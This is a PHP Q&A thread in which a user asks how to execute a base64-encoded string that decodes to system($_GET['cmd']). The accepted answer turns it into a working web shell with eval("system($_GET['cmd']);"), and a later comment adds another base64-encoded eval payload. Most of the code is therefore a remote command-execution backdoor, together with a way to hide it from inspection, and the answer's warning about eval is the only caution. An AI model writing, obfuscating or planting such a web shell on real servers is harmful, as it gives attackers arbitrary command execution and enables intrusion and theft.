# How to run system function inside base 64 decode function

Tags: php

I'm trying to Test script

I want to run system function inside base64 decode function

But it doesn't work any idea !

```
<?php base64_decode("c3lzdGVtKCRfR0VUWydjbWQnXSkg")
?>
```

[localhost/test.php?cmd=id](http://localhost/test.php?cmd=id)

Answer (score 1, accepted):

PHP's `base64_decode` function gets a string (which is encoded in base64) and decode it back to the original data. The function then returns the decoded data as string, which means your code actually looks like:

```
<?php "system($_GET['cmd']) "
?>
```

(Running this code makes no sense).

If you want to PHP to "run" (or Evaluate) the string that you juse decoded - you should use the php's `eval` language construct:

```
<?php eval("system($_GET['cmd']);");
?>
```

Note the `;` added in the end of the string (inside the `eval` call).

> **Very important**
>
> Note that the use of eval is very dangerous because it allows **execution of arbitrary code**.
>   You should really **NOT** use it unless you **REALLY** know what you are doing.

Comment: i used `eva`l like this `base64_decode("ZXZhbCgic3lzdGVtKCRfR0VUWydjbWQnXSk7Iik=");` but doesn't work

Comment: Read again my answer, everything is explained there.